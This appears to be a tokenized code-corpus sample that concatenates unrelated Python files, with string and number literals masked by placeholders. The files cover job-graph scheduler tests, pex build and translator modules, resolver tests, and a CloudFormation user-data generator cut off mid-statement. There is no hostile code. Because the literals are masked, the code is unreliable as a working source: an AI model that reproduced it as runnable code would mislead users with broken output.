self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:B>" ] ) <EOL> def test_simple_unconnected_tree ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ ] ) , <EOL> ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:A>" ] ) <EOL> def test_dependee_depends_on_dependency_of_its_dependency ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" , "<STR_LIT:C>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:C>" ] ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ ] ) , <EOL> ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( [ "<STR_LIT:C>" , "<STR_LIT:B>" , "<STR_LIT:A>" ] , self . 
jobs_run ) <EOL> def test_one_failure_raises_exception ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , raising_fn , [ ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_failure_of_dependency_does_not_run_dependents ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:F>" ] ) , <EOL> self . job ( "<STR_LIT:F>" , raising_fn , [ ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( [ "<STR_LIT:F>" ] , self . jobs_run ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_failure_of_dependency_does_not_run_second_order_dependents ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:F>" ] ) , <EOL> self . job ( "<STR_LIT:F>" , raising_fn , [ ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( [ "<STR_LIT:F>" ] , self . jobs_run ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_failure_of_one_leg_of_tree_does_not_cancel_other ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:F>" , raising_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertTrue ( self . jobs_run == [ "<STR_LIT:B>" , "<STR_LIT:F>" , "<STR_LIT:A>" ] or self . jobs_run == [ "<STR_LIT:B>" , "<STR_LIT:A>" , "<STR_LIT:F>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . 
exception ) ) <EOL> def test_failure_of_disconnected_job_does_not_cancel_non_dependents ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:F>" , raising_fn , [ ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( [ "<STR_LIT:A>" , "<STR_LIT:F>" ] , self . jobs_run ) <EOL> def test_cycle_in_graph_causes_failure ( self ) : <EOL> with self . assertRaises ( NoRootJobError ) as cm : <EOL> ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] ) ] ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> str ( cm . exception ) ) <EOL> def test_non_existent_dependency_causes_failure ( self ) : <EOL> with self . assertRaises ( UnknownJobError ) as cm : <EOL> ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT>" ] ) ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_on_success_callback_raises_error ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , on_success = raising_fn ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_on_failure_callback_raises_error ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , raising_fn , [ ] , on_failure = raising_fn ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) as cm : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_same_key_scheduled_twice_is_error ( self ) : <EOL> with self . assertRaises ( JobExistsError ) as cm : <EOL> ExecutionGraph ( [ self . job ( "<STR_LIT>" , passing_fn , [ ] ) , <EOL> self . 
job ( "<STR_LIT>" , passing_fn , [ ] ) ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cm . exception ) ) <EOL> def test_priorities_for_chain_of_jobs ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:8> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:B>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:D>" , passing_fn , [ "<STR_LIT:C>" ] , <NUM_LIT:1> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT:15> , "<STR_LIT:B>" : <NUM_LIT:7> , "<STR_LIT:C>" : <NUM_LIT:3> , "<STR_LIT:D>" : <NUM_LIT:1> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:D>" ] ) <EOL> def test_priorities_for_fork ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:1> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT:6> , "<STR_LIT:B>" : <NUM_LIT:2> , "<STR_LIT:C>" : <NUM_LIT:1> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:B>" , "<STR_LIT:C>" ] ) <EOL> def test_priorities_for_mirrored_fork ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:1> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT:6> , "<STR_LIT:B>" : <NUM_LIT:1> , "<STR_LIT:C>" : <NUM_LIT:2> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . 
jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:C>" , "<STR_LIT:B>" ] ) <EOL> def test_priorities_for_diamond ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:8> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:D>" , passing_fn , [ "<STR_LIT:B>" , "<STR_LIT:C>" ] , <NUM_LIT:1> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:B>" : <NUM_LIT:5> , "<STR_LIT:C>" : <NUM_LIT:3> , "<STR_LIT:D>" : <NUM_LIT:1> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:D>" ] ) <EOL> def test_priorities_for_mirrored_diamond ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:8> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:D>" , passing_fn , [ "<STR_LIT:B>" , "<STR_LIT:C>" ] , <NUM_LIT:1> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:B>" : <NUM_LIT:3> , "<STR_LIT:C>" : <NUM_LIT:5> , "<STR_LIT:D>" : <NUM_LIT:1> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:C>" , "<STR_LIT:B>" , "<STR_LIT:D>" ] ) <EOL> def test_priorities_for_skewed_diamond ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] , <NUM_LIT:1> ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:2> ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ "<STR_LIT:B>" ] , <NUM_LIT:4> ) , <EOL> self . job ( "<STR_LIT:D>" , passing_fn , [ "<STR_LIT:A>" ] , <NUM_LIT:8> ) , <EOL> self . 
job ( "<STR_LIT:E>" , passing_fn , [ "<STR_LIT:C>" , "<STR_LIT:D>" ] , <NUM_LIT:16> ) ] ) <EOL> self . assertEqual ( exec_graph . _job_priority , { "<STR_LIT:A>" : <NUM_LIT> , "<STR_LIT:B>" : <NUM_LIT> , "<STR_LIT:C>" : <NUM_LIT:20> , "<STR_LIT:D>" : <NUM_LIT> , "<STR_LIT:E>" : <NUM_LIT:16> } ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" , "<STR_LIT:D>" , "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:E>" ] ) <EOL> def test_jobs_not_canceled_multiple_times ( self ) : <EOL> failures = list ( ) <EOL> def collect_failure ( jobname ) : <EOL> def fn ( ) : <EOL> failures . append ( jobname ) <EOL> return fn <EOL> def my_job ( name , result_fn , deps ) : <EOL> return self . job ( name , result_fn , deps , <NUM_LIT:1> , on_failure = collect_failure ( name ) ) <EOL> exec_graph = ExecutionGraph ( [ my_job ( '<STR_LIT:A>' , raising_fn , [ ] ) , <EOL> my_job ( '<STR_LIT>' , passing_fn , [ '<STR_LIT:A>' ] ) , <EOL> my_job ( '<STR_LIT>' , passing_fn , [ '<STR_LIT:A>' ] ) , <EOL> my_job ( '<STR_LIT>' , passing_fn , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> my_job ( '<STR_LIT>' , passing_fn , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> my_job ( '<STR_LIT:E>' , passing_fn , [ '<STR_LIT>' ] ) ] ) <EOL> with self . assertRaises ( ExecutionFailure ) : <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ '<STR_LIT:A>' ] ) <EOL> self . assertEqual ( failures , [ '<STR_LIT:A>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:E>' ] ) </s>
import os

from distutils import log

from setuptools import Command

from pex.bin.pex import build_pex, configure_clp
from pex.common import die
from pex.compatibility import ConfigParser, StringIO, string
from pex.variables import ENV


class bdist_pex(Command):
    """Setuptools/distutils command that builds the current package as a PEX.

    Builds one PEX for the package itself, or (with the "all" flag) one PEX
    per declared console script.  Extra arguments for the pex tool are passed
    through the pex-args option.
    """

    description = "<STR_LIT>"

    # (long-name, short-name, help) triples per the distutils option protocol.
    user_options = [
        ('<STR_LIT>', None, '<STR_LIT>'),
        ('<STR_LIT>', None, '<STR_LIT>'),
        ('<STR_LIT>', None, '<STR_LIT>'),
    ]

    boolean_options = [
        '<STR_LIT>',
    ]

    def initialize_options(self):
        # Defaults required by the distutils command lifecycle; refined in
        # finalize_options() after option parsing.
        self.bdist_all = False
        self.bdist_dir = None
        self.pex_args = '<STR_LIT>'

    def finalize_options(self):
        # pex-args arrives as one whitespace-separated string; turn it into
        # an argv list for the pex option parser used in run().
        self.pex_args = self.pex_args.split()

    def _write(self, pex_builder, target, script=None):
        """Emit one PEX at ``target``, optionally bound to a console script.

        Clones the shared builder so each emitted PEX can carry its own
        entry script without mutating the builder for later writes.
        """
        builder = pex_builder.clone()
        if script is not None:
            builder.set_script(script)
        builder.build(target)

    def parse_entry_points(self):
        """Return a dict mapping console-script name -> entry point string.

        Accepts either the raw ini-style string form or the dict form of
        ``distribution.entry_points``; returns {} when none are declared.
        """
        def split_and_strip(entry_point):
            # BUGFIX: maxsplit was 2, which produces three fields for an
            # entry such as 'name = pkg.mod:func = extra' and breaks the
            # 2-tuple unpacking below.  'name = target' must be split on
            # the FIRST '=' only.
            console_script, entry_point = entry_point.split('<STR_LIT:=>', 1)
            return console_script.strip(), entry_point.strip()

        raw_entry_points = self.distribution.entry_points
        if isinstance(raw_entry_points, string):
            parser = ConfigParser()
            # NOTE(review): readfp() is deprecated in Python 3 in favor of
            # read_file(); kept for Python 2 compatibility via
            # pex.compatibility — confirm before modernizing.
            parser.readfp(StringIO(raw_entry_points))
            if parser.has_section('<STR_LIT>'):
                return dict(parser.items('<STR_LIT>'))
        elif isinstance(raw_entry_points, dict):
            try:
                return dict(split_and_strip(script)
                            for script in raw_entry_points.get('<STR_LIT>', []))
            except ValueError:
                # Malformed entry (no '='): fall through and return {}.
                pass
        elif raw_entry_points is not None:
            die('<STR_LIT>')
        return {}

    def run(self):
        name = self.distribution.get_name()
        version = self.distribution.get_version()
        parser, options_builder = configure_clp()
        # Anchor all relative paths at the directory containing setup.py.
        package_dir = os.path.dirname(os.path.realpath(os.path.expanduser(
            self.distribution.script_name)))
        if self.bdist_dir is None:
            self.bdist_dir = os.path.join(package_dir, '<STR_LIT>')
        options, reqs = parser.parse_args(self.pex_args)
        # The entry point/script is chosen by this command, not by pex-args.
        if options.entry_point or options.script:
            die('<STR_LIT>')
        # The package itself is resolved alongside any extra requirements.
        reqs = [package_dir] + reqs
        with ENV.patch(PEX_VERBOSE=str(options.verbosity), PEX_ROOT=options.pex_root):
            pex_builder = build_pex(reqs, options, options_builder)
        console_scripts = self.parse_entry_points()
        target = os.path.join(self.bdist_dir, name + '<STR_LIT:->' + version + '<STR_LIT>')
        if self.bdist_all:
            # One PEX per console script, each named after its script.
            for script_name in console_scripts:
                target = os.path.join(self.bdist_dir, script_name)
                log.info('<STR_LIT>' % (script_name, target))
                self._write(pex_builder, target, script=script_name)
        elif name in console_scripts:
            # The package declares a script matching its own name: bind it.
            log.info('<STR_LIT>' % (name, target))
            self._write(pex_builder, target, script=name)
        else:
            # No matching script: emit a plain PEX with no entry script.
            log.info('<STR_LIT>' % target)
            self._write(pex_builder, target, script=None)
from __future__ import absolute_import

import os
import traceback
from abc import abstractmethod

from .archiver import Archiver
from .common import chmod_plus_w, safe_copy, safe_mkdtemp, safe_rmtree
from .compatibility import AbstractClass
from .installer import WheelInstaller
from .interpreter import PythonInterpreter
from .package import EggPackage, Package, SourcePackage, WheelPackage
from .platforms import Platform
from .tracer import TRACER
from .util import DistributionHelper


class TranslatorBase(AbstractClass):
    """<STR_LIT>"""

    # Contract: turn a package/link into a distribution rooted at ``into``
    # (a directory), or return None when this translator does not apply.
    @abstractmethod
    def translate(self, link, into=None):
        pass


class ChainedTranslator(TranslatorBase):
    """<STR_LIT>"""

    def __init__(self, *translators):
        # filter(None, ...) drops falsy entries so callers may pass
        # conditionally-constructed translators (e.g. None placeholders).
        self._translators = list(filter(None, translators))
        for tx in self._translators:
            if not isinstance(tx, TranslatorBase):
                raise ValueError('<STR_LIT>' % type(tx))

    def translate(self, package, into=None):
        # First translator producing a truthy distribution wins; implicitly
        # returns None when every translator declines.
        for tx in self._translators:
            dist = tx.translate(package, into=into)
            if dist:
                return dist

    def __str__(self):
        return '<STR_LIT>' % (
            '<STR_LIT:U+002CU+0020>'.join((tx.__class__.__name__ for tx in self._translators)))


class SourceTranslator(TranslatorBase):
    # Translates a SourcePackage by unpacking it, optionally running 2to3,
    # and building a binary distribution with the configured installer.

    @classmethod
    def run_2to3(cls, path):
        # Imported lazily: lib2to3 is only needed when use_2to3 is enabled.
        from lib2to3.refactor import get_fixers_from_package, RefactoringTool
        rt = RefactoringTool(get_fixers_from_package('<STR_LIT>'))
        with TRACER.timed('<STR_LIT>' % path):
            for root, dirs, files in os.walk(path):
                for fn in files:
                    full_fn = os.path.join(root, fn)
                    if full_fn.endswith('<STR_LIT>'):
                        with TRACER.timed('<STR_LIT:%s>' % fn, V=<NUM_LIT:3>):
                            try:
                                # Files unpacked from archives may be
                                # read-only; make writable before refactor.
                                chmod_plus_w(full_fn)
                                rt.refactor_file(full_fn, write=True)
                            except IOError:
                                # Best-effort: log and continue with the
                                # remaining files.
                                TRACER.log('<STR_LIT>' % fn)
                                TRACER.log(traceback.format_exc())

    # NOTE(review): PythonInterpreter.get() / Platform.current() in the
    # defaults are evaluated once at import time, not per instantiation —
    # confirm that is the intended behavior.
    def __init__(self,
                 interpreter=PythonInterpreter.get(),
                 platform=Platform.current(),
                 use_2to3=False,
                 installer_impl=WheelInstaller):
        self._interpreter = interpreter
        self._installer_impl = installer_impl
        self._use_2to3 = use_2to3
        self._platform = platform

    def translate(self, package, into=None):
        """<STR_LIT>"""
        # Only local source packages are handled here.
        if not isinstance(package, SourcePackage):
            return None
        if not package.local:
            raise ValueError('<STR_LIT>')
        installer = None
        version = self._interpreter.version
        unpack_path = Archiver.unpack(package.local_path)
        into = into or safe_mkdtemp()
        try:
            if self._use_2to3 and version >= (<NUM_LIT:3>,):
                with TRACER.timed('<STR_LIT>' % package.name):
                    self.run_2to3(unpack_path)
            installer = self._installer_impl(
                unpack_path,
                interpreter=self._interpreter,
                # Certain package names are exempted from strict installs.
                strict=(package.name not in ('<STR_LIT>', '<STR_LIT>')))
            with TRACER.timed('<STR_LIT>' % package.name):
                try:
                    dist_path = installer.bdist()
                except self._installer_impl.InstallFailure as e:
                    TRACER.log('<STR_LIT>' % (unpack_path, e))
                    return None
            # Copy the built distribution into the destination directory and
            # re-validate it as a recognized, compatible package.
            target_path = os.path.join(into, os.path.basename(dist_path))
            safe_copy(dist_path, target_path)
            target_package = Package.from_href(target_path)
            if not target_package:
                TRACER.log('<STR_LIT>' % target_path)
                return None
            if not target_package.compatible(self._interpreter.identity, platform=self._platform):
                TRACER.log('<STR_LIT>' % (
                    target_package, self._interpreter.identity, self._platform))
                return None
            return DistributionHelper.distribution_from_path(target_path)
        except Exception as e:
            # Deliberately broad: any failure is logged and surfaces as an
            # implicit None so a ChainedTranslator can try other strategies.
            TRACER.log('<STR_LIT>' % package)
            TRACER.log(traceback.format_exc())
        finally:
            # Always clean up the installer's scratch space and the
            # unpacked source tree.
            if installer:
                installer.cleanup()
            if unpack_path:
                safe_rmtree(unpack_path)


class BinaryTranslator(TranslatorBase):
    # Translates an already-built binary package (of ``package_type``) by
    # copying it into place — no build step.

    def __init__(self,
                 package_type,
                 interpreter=PythonInterpreter.get(),
                 platform=Platform.current()):
        self._package_type = package_type
        self._platform = platform
        self._identity = interpreter.identity

    def translate(self, package, into=None):
        """<STR_LIT>"""
        if not package.local:
            raise ValueError('<STR_LIT>')
        if not isinstance(package, self._package_type):
            return None
        if not package.compatible(identity=self._identity, platform=self._platform):
            TRACER.log('<STR_LIT>' % (
                package, self._identity, self._platform))
            return None
        into = into or safe_mkdtemp()
        target_path = os.path.join(into, package.filename)
        safe_copy(package.local_path, target_path)
        return DistributionHelper.distribution_from_path(target_path)


class EggTranslator(BinaryTranslator):
    # BinaryTranslator specialized to egg packages.

    def __init__(self, **kw):
        super(EggTranslator, self).__init__(EggPackage, **kw)


class WheelTranslator(BinaryTranslator):
    # BinaryTranslator specialized to wheel packages.

    def __init__(self, **kw):
        super(WheelTranslator, self).__init__(WheelPackage, **kw)


class Translator(object):

    # NOTE(review): as above, Platform.current() here is evaluated once at
    # import time — confirm intended.
    @staticmethod
    def default(platform=Platform.current(), interpreter=None):
        # Preference order: wheel, then egg, then build from source.
        interpreter = interpreter or PythonInterpreter.get()
        whl_translator = WheelTranslator(platform=platform, interpreter=interpreter)
        egg_translator = EggTranslator(platform=platform, interpreter=interpreter)
        source_translator = SourceTranslator(platform=platform, interpreter=interpreter)
        return ChainedTranslator(whl_translator, egg_translator, source_translator)
import pkg_resources
import pytest

from pex.iterator import Iterator
from pex.package import Package, SourcePackage
from pex.resolvable import (
    Resolvable,
    ResolvableDirectory,
    ResolvablePackage,
    ResolvableRepository,
    ResolvableRequirement,
    resolvables_from_iterable
)
from pex.resolver_options import ResolverOptionsBuilder
from pex.testing import make_source_dir

# Python 3 ships mock in unittest; fall back to the standalone package on 2.
try:
    from unittest import mock
except ImportError:
    import mock


def test_resolvable_package():
    """A local source archive resolves to exactly itself as a package."""
    builder = ResolverOptionsBuilder()
    source_name = '<STR_LIT>'
    pkg = SourcePackage.from_href(source_name)
    resolvable = ResolvablePackage.from_string(source_name, builder)
    assert resolvable.packages() == [pkg]
    # compatible() must not consult the crawler iterator for a concrete
    # package: no iter() calls are expected.
    mock_iterator = mock.create_autospec(Iterator, spec_set=True)
    mock_iterator.iter.return_value = iter([])
    assert resolvable.compatible(mock_iterator) == []
    assert mock_iterator.iter.mock_calls == []
    assert resolvable.name == '<STR_LIT:foo>'
    assert resolvable.exact is True
    assert resolvable.extras() == []
    # Extras requested in brackets are parsed out of the string form.
    resolvable = ResolvablePackage.from_string(source_name + '<STR_LIT>', builder)
    assert resolvable.extras() == ['<STR_LIT>', '<STR_LIT>']
    # Resolvable.get dispatches package-looking strings to ResolvablePackage.
    assert Resolvable.get('<STR_LIT>') == ResolvablePackage.from_string(
        '<STR_LIT>', builder)
    # A bare name is not a valid package href.
    with pytest.raises(ResolvablePackage.InvalidRequirement):
        ResolvablePackage.from_string('<STR_LIT:foo>', builder)


def test_resolvable_repository():
    """An unsupported repository spec is rejected."""
    with pytest.raises(Resolvable.InvalidRequirement):
        ResolvableRepository.from_string('<STR_LIT>',
                                         ResolverOptionsBuilder())


def test_resolvable_requirement():
    """Requirement strings parse into name/exactness/extras and filter packages."""
    req = '<STR_LIT>'
    resolvable = ResolvableRequirement.from_string(req, ResolverOptionsBuilder(fetchers=[]))
    assert resolvable.requirement == pkg_resources.Requirement.parse('<STR_LIT>')
    assert resolvable.name == '<STR_LIT:foo>'
    assert resolvable.exact is True
    assert resolvable.extras() == ['<STR_LIT:bar>']
    # The builder's fetcher list is carried through to the options.
    assert resolvable.options._fetchers == []
    # A requirement has no concrete packages of its own.
    assert resolvable.packages() == []
    # compatible() delegates to the iterator with the parsed requirement.
    source_pkg = SourcePackage.from_href('<STR_LIT>')
    mock_iterator = mock.create_autospec(Iterator, spec_set=True)
    mock_iterator.iter.return_value = iter([source_pkg])
    assert resolvable.compatible(mock_iterator) == [source_pkg]
    assert mock_iterator.iter.mock_calls == [
        mock.call(pkg_resources.Requirement.parse('<STR_LIT>'))]
    # A bare name without a pin is not exact.
    resolvable = ResolvableRequirement.from_string('<STR_LIT:foo>', ResolverOptionsBuilder())
    assert resolvable.exact is False
    assert Resolvable.get('<STR_LIT:foo>') == ResolvableRequirement.from_string(
        '<STR_LIT:foo>', ResolverOptionsBuilder())


def test_resolvable_directory():
    """A local source directory resolves by its setup() name, with extras."""
    builder = ResolverOptionsBuilder()
    with make_source_dir(name='<STR_LIT>') as td:
        rdir = ResolvableDirectory.from_string(td, builder)
        assert rdir.name == pkg_resources.safe_name('<STR_LIT>')
        assert rdir.extras() == []
        rdir = ResolvableDirectory.from_string(td + '<STR_LIT>', builder)
        assert rdir.name == pkg_resources.safe_name('<STR_LIT>')
        assert rdir.extras() == ['<STR_LIT>', '<STR_LIT>']


def test_resolvables_from_iterable():
    """Mixed requirement forms (string, Package, Requirement) all normalize."""
    builder = ResolverOptionsBuilder()
    reqs = [
        '<STR_LIT:foo>',
        Package.from_href('<STR_LIT>'),
        pkg_resources.Requirement.parse('<STR_LIT>'),
    ]
    resolved_reqs = list(resolvables_from_iterable(reqs, builder))
    assert resolved_reqs == [
        ResolvableRequirement.from_string('<STR_LIT:foo>', builder),
        ResolvablePackage.from_string('<STR_LIT>', builder),
        ResolvableRequirement.from_string('<STR_LIT>', builder),
    ]
<s> from stormed . method . codegen import id2class </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import glob <EOL> import json <EOL> import os <EOL> import sys <EOL> import boto3 <EOL> import yaml <EOL> import tags <EOL> from cfn_pyplates import core <EOL> from cfn_pyplates import functions <EOL> class ConfigError ( Exception ) : <EOL> pass <EOL> def main ( ) : <EOL> config = load_config ( ) <EOL> derive_config ( config ) <EOL> unique_suffix = datetime . datetime . utcnow ( ) . strftime ( "<STR_LIT>" ) <EOL> commit = os . popen ( """<STR_LIT>""" ) . read ( ) . rstrip ( ) <EOL> assert commit <EOL> assert "<STR_LIT:'>" not in config [ '<STR_LIT>' ] <EOL> instance_tags = tags . load ( ) <EOL> instance_tags . append ( { '<STR_LIT>' : '<STR_LIT:Name>' , <EOL> '<STR_LIT>' : "<STR_LIT>" + unique_suffix } ) <EOL> config [ '<STR_LIT>' ] = instance_tags <EOL> config_uri = save_s3_config ( config , unique_suffix ) <EOL> sys . stderr . write ( "<STR_LIT>" . format ( config_uri ) ) <EOL> user_data_script = functions . join ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , functions . ref ( "<STR_LIT>" ) , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , functions . ref ( '<STR_LIT>' ) , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT:\n>" , <EOL> "<STR_LIT>" , config [ '<STR_LIT>' ] , "<STR_LIT>" , <EOL> "<STR_LIT>" , commit , "<STR_LIT:\n>" , <EOL> "<STR_LIT:\n>" , <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> open ( '<STR_LIT>' ) . read ( ) ) <EOL> cft = core . CloudFormationTemplate ( description = "<STR_LIT>" ) <EOL> cft . resources . ec2_instance = core . 
